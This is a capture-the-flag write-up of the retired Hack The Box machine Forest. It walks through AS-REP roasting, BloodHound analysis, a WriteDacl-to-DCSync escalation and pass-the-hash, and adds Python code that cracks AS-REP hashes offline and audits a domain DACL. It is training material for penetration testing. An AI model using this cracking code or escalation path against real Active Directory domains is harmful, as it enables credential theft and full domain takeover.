OSCP PREPARATIONS – HTB Forest

Forest is a retired Hack The Box machine running Windows. The goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to fingerprint the target.
Classic Scan

Full Port Scan

The port scan turns up quite a few open ports.

  • Ports 88 (Kerberos) and 389 (LDAP) are open, so this is almost certainly an Active Directory domain controller.
  • The domain is htb.local and the hostname (FQDN) is FOREST.htb.local.
  • The operating system is Windows Server 2016 Standard 14393.
  • We will try anonymous LDAP and SMB enumeration.
  • If we find credentials through LDAP or SMB, we can use the WinRM (WS-Management) ports to get a shell.
This is what the nmap scan tells us about the system.
Next, LDAP enumeration with ldapsearch:

ldapServiceName: htb.local:forest$@HTB.LOCAL

Filter users

Here we have identified the domain users.
Next, SMB enumeration with enum4linux:

The user svc-alfresco stands out here: it did not show up in the ldapsearch output, and it belongs to the “Service Accounts” group.
We list the shares with smbclient and find nothing.

Anonymous login succeeds, but no shares are listed.
Let's try AS-REP roasting with GetNPUsers.py. For accounts that do not require Kerberos pre-authentication, the KDC returns an AS-REP whose encrypted part is protected only by a key derived from the user's password, so we can crack that blob offline and recover the password.
We put the users found above into userlist.txt with nano and then query them with the tool.

We save the AS-REP hash to a file and crack it with john.

This gives us the password:
svc-alfresco:s3rvice
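To see what john is actually doing with that hash, here is an added example (not code from the original post) that reproduces both sides in Python: the KDC side that encrypts the AS-REP enc-part under the account's NT hash (RC4-HMAC, etype 23, RFC 4757), and the attacker side that walks a wordlist and tries to decrypt the `$krb5asrep$23$...` line GetNPUsers.py prints. The plaintext, the wordlist and the principal are constructed here; MD4 is implemented by hand because hashlib's md4 is frequently unavailable under OpenSSL 3.

```python
import hmac
import hashlib
import os
import struct
from typing import Optional

ETYPE_RC4_HMAC = 23
ASREP_KEY_USAGE = 8  # RFC 4757: Kerberos usage 3 (AS-REP enc-part) maps to T = 8 for RC4-HMAC


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); the NT hash is MD4 over the UTF-16LE password."""
    mask = 0xFFFFFFFF
    def f(x, y, z): return ((x & y) | (~x & z)) & mask
    def g(x, y, z): return ((x & y) | (x & z) | (y & z)) & mask
    def h(x, y, z): return (x ^ y ^ z) & mask
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & mask
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def _rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes) -> bytes:
    """RFC 4757: checksum || RC4(Ke, confounder || plaintext)."""
    ki = _hmac_md5(key, struct.pack("<I", usage))
    data = os.urandom(8) + plaintext  # 8-byte random confounder
    checksum = _hmac_md5(ki, data)
    ke = _hmac_md5(key, checksum)
    return checksum + _rc4(ke, data)


def rc4_hmac_decrypt(key: bytes, usage: int, ciphertext: bytes) -> Optional[bytes]:
    """Plaintext without the confounder, or None when the checksum does not verify (wrong key)."""
    checksum, edata = ciphertext[:16], ciphertext[16:]
    ki = _hmac_md5(key, struct.pack("<I", usage))
    data = _rc4(_hmac_md5(key, checksum), edata)
    return data[8:] if hmac.compare_digest(_hmac_md5(ki, data), checksum) else None


def build_asrep_hash(user: str, realm: str, password: str, enc_part: bytes) -> str:
    """KDC side: AS-REP enc-part under the NT hash, in the john/hashcat line format."""
    blob = rc4_hmac_encrypt(nt_hash(password), ASREP_KEY_USAGE, enc_part)
    return f"$krb5asrep${ETYPE_RC4_HMAC}${user}@{realm}:{blob[:16].hex()}${blob[16:].hex()}"


def crack_asrep_hash(hash_line: str, wordlist) -> Optional[str]:
    """Attacker side: for each candidate derive the NT hash and try to decrypt; no KDC involved."""
    header, _, blob = hash_line.partition(":")
    tag, etype = header.split("$")[1:3]
    if tag != "krb5asrep" or int(etype) != ETYPE_RC4_HMAC:
        raise ValueError("only $krb5asrep$23$ lines are handled here")
    checksum_hex, _, edata_hex = blob.partition("$")
    ciphertext = bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), ASREP_KEY_USAGE, ciphertext) is not None:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed sample: the password from this box, a made-up enc-part and a tiny wordlist.
    line = build_asrep_hash("svc-alfresco", "HTB.LOCAL", "s3rvice", b"constructed enc-as-rep-part")
    print(line)
    print("cracked:", crack_asrep_hash(line, ["Password1", "Welcome1", "s3rvice"]))
```

The important property is that nothing in the cracking loop touches the KDC: once the AS-REP is captured, guessing is limited only by local compute, which is why disabling pre-authentication on an account with a weak password is a direct credential leak. Enabling pre-authentication (clearing DONT_REQ_PREAUTH on the account) removes this path.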
Let's connect with evil-winrm using this credential.

We connect successfully and get the user flag, but we still cannot read the root flag, so we move on to local enumeration.

Upload and run winPEAS

The winPEAS output gives us nothing useful, so let's use BloodHound.
First I upload and run SharpHound on the target machine.
When collection completes, it produces a zip file.
We transfer this zip file to our local machine to analyse it with BloodHound.

I import the zip file into BloodHound.
I right-click the user SVC-ALFRESCO and choose “Mark User as Owned”.
In the Analysis tab I click “Shortest Path from Owned Principals”

and interpret the resulting graph.

We can see that svc-alfresco is a member of the Service Accounts group, which is a member of the Privileged IT Accounts group, which in turn is a member of Account Operators. Account Operators has GenericAll over the Exchange Windows Permissions group, and that group has WriteDacl on the domain object.

Through this nested membership, svc-alfresco is effectively a member of Privileged IT Accounts and Account Operators as well, not just Service Accounts.
The Account Operators group grants limited account-creation privileges, so svc-alfresco can create new users in the domain.
The Account Operators group has GenericAll over the Exchange Windows Permissions group. GenericAll is full control of the object, which includes changing the group's membership directly. Because svc-alfresco is (transitively) a member of Account Operators, it can add users to Exchange Windows Permissions.
The Exchange Windows Permissions group has WriteDacl on the HTB.LOCAL domain object. WriteDacl lets its members modify the domain's DACL (Discretionary Access Control List). We will abuse this to grant ourselves DCSync rights, which allow us to request directory replication and dump every password hash in the domain.
Putting all the pieces together, our attack path is as follows.

  1. Create a user in the domain. This is possible because svc-alfresco is (transitively) a member of Account Operators.
  2. Add the user to the Exchange Windows Permissions group. This is possible because Account Operators has GenericAll over that group.
  3. Grant the user DCSync rights. This is possible because the user is now a member of Exchange Windows Permissions, which has WriteDacl on the htb.local domain object.
  4. Perform a DCSync attack and dump the password hashes of all users in the domain.
  5. Use the Administrator hash in a Pass-the-Hash attack to get a SYSTEM shell.
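Step 3 is the step worth understanding in detail, because it is also the one a defender can check for. The domain object's security descriptor gains three object ACEs granting the control-access (CR) right for the replication extended rights; the following is an added example (not the post's own code, and not how PowerView implements it internally, which goes through the .NET ActiveDirectorySecurity API) that writes those ACEs in SDDL form and audits a DACL for every principal that can DCSync or could grant itself DCSync. The three GUIDs are the real schema GUIDs; the SIDs and the trimmed domain DACL are constructed for the example.

```python
import re
from typing import Dict, List

# Extended rights that DCSync needs (the set Add-DomainObjectAcl -Rights DCSync grants).
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"           # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"       # DS-Replication-Get-Changes-All
GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"  # DS-Replication-Get-Changes-In-Filtered-Set
REPLICATION_GUIDS = {GET_CHANGES, GET_CHANGES_ALL, GET_CHANGES_FILTERED}

# Access-mask bits behind the two-letter SDDL rights tokens we care about.
_MASK_TOKENS = {"GA": 0x10000000, "WD": 0x00040000, "CR": 0x00000100}

# Constructed SIDs standing in for the Forest objects (the real RIDs are not on the page).
EXCHANGE_WP_SID = "S-1-5-21-1111-2222-3333-1121"   # "Exchange Windows Permissions" (constructed)
NEW_USER_SID = "S-1-5-21-1111-2222-3333-1601"      # the user created in step 1 (constructed)

# Constructed, trimmed DACL of the domain head before the attack: Domain Admins full
# control, Administrators both replication rights, Enterprise Domain Controllers only
# Get-Changes, and Exchange Windows Permissions with WriteDacl (the Forest misconfiguration).
SAMPLE_DOMAIN_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)"
    f"(OA;;CR;{GET_CHANGES};;ED)"
    f"(OA;;CR;{GET_CHANGES};;BA)"
    f"(OA;;CR;{GET_CHANGES_ALL};;BA)"
    f"(A;;WD;;;{EXCHANGE_WP_SID})"
    "S:AI(AU;SA;WDWOWP;;;WD)"
)


def dcsync_aces(sid: str) -> List[str]:
    """The three object ACEs step 3 adds: control-access (CR) on each replication right."""
    return [f"(OA;;CR;{guid};;{sid})" for guid in (GET_CHANGES, GET_CHANGES_ALL, GET_CHANGES_FILTERED)]


def grant_dcsync(sddl: str, sid: str) -> str:
    """Append the DCSync ACEs to the DACL; the D: section ends where the S: (SACL) section begins."""
    head, sep, tail = sddl.partition("S:")
    return head + "".join(dcsync_aces(sid)) + sep + tail


def parse_dacl(sddl: str) -> List[Dict[str, str]]:
    """Split the D: section into ACEs of the form (type;flags;rights;object;inherit_object;sid)."""
    dacl = sddl.partition("D:")[2].partition("S:")[0]
    aces = []
    for body in re.findall(r"\(([^)]*)\)", dacl):
        fields = body.split(";")
        if len(fields) < 6:
            continue  # conditional/callback ACEs are out of scope here
        aces.append(dict(zip(("type", "flags", "rights", "object", "inherit_object", "sid"), fields)))
    return aces


def _rights(field: str) -> set:
    """Rights appear either as concatenated two-letter tokens or as a hex access mask."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {tok for tok, bit in _MASK_TOKENS.items() if mask & bit}
    return {field[i:i + 2] for i in range(0, len(field), 2)}


def audit_domain_dacl(sddl: str) -> Dict[str, List[str]]:
    """Who can replicate the domain, or could grant themselves the right to.
    DCSync needs Get-Changes AND Get-Changes-All; CR with an empty object GUID is every
    extended right; GenericAll or WriteDacl on the domain lets a principal add the ACEs."""
    repl: Dict[str, set] = {}
    findings: Dict[str, set] = {}
    for ace in parse_dacl(sddl):
        if ace["type"] not in ("A", "OA"):
            continue  # deny ACEs are not evaluated in this sketch
        rights, sid, obj = _rights(ace["rights"]), ace["sid"], ace["object"].lower()
        if "GA" in rights:
            findings.setdefault(sid, set()).add("GenericAll")
        if "WD" in rights:
            findings.setdefault(sid, set()).add("WriteDacl")
        if "CR" in rights:
            if obj == "":
                findings.setdefault(sid, set()).add("AllExtendedRights")
            elif obj in REPLICATION_GUIDS:
                repl.setdefault(sid, set()).add(obj)
    for sid, guids in repl.items():
        if {GET_CHANGES, GET_CHANGES_ALL} <= guids:
            findings.setdefault(sid, set()).add("DCSync")
    return {sid: sorted(r) for sid, r in findings.items()}


if __name__ == "__main__":
    print("before:", audit_domain_dacl(SAMPLE_DOMAIN_SDDL))
    print("after: ", audit_domain_dacl(grant_dcsync(SAMPLE_DOMAIN_SDDL, NEW_USER_SID)))
```

Run against the pre-attack DACL, the audit already flags the Exchange Windows Permissions SID with WriteDacl, which is the finding that would have caught this box before anyone DCSynced it; after `grant_dcsync` the new user shows up with DCSync outright. On a real domain the same check runs over the nTSecurityDescriptor of the domain head (for example, `(Get-Acl "AD:\DC=htb,DC=local").Sddl` in PowerShell) and any unexpected principal in the result is an incident.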

We create a user named Ma

I add the user Ma to the Exchange Windows Permissions group

Let's verify that the user is in the group

Now the user has the group membership we need.
Next we grant the user DCSync rights using PowerView. First, we upload PowerView with evil-winrm's upload command.

We import the PowerView script into the session

Then we grant the DCSync rights to Ma with PowerView's Add-DomainObjectAcl

With the rights in place, we dump the domain hashes from our attacking machine with impacket's secretsdump.py

We now have the Administrator NTLM hash, and we use it for a Pass-the-Hash login with impacket's psexec.py.

We get a shell as NT AUTHORITY\SYSTEM and can read the root flag.
